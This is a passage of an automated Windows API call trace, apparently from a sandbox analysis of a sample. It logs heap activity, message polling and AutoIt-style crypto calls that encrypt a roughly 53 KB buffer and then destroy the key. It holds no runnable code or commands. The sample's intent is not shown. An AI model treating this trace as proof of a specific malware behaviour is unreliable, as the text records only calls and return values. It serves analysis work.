0x889ac0 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.758] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.758] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.758] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.758] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.759] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.759] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.760] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xcef6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xcf00) returned 1 [0032.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.761] CharLowerBuffW (in: lpsz="byte[52993]", cchLength=0xb | out: lpsz="byte[52993]") returned 0xb [0032.761] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.763] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.763] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.764] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0xcef6, dwBufLen=0xcf00 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0xcf00) returned 1 [0032.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.767] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.767] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.776] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.776] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.777] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.777] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.777] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.777] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.777] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.777] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.778] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.778] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.778] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.778] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.778] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 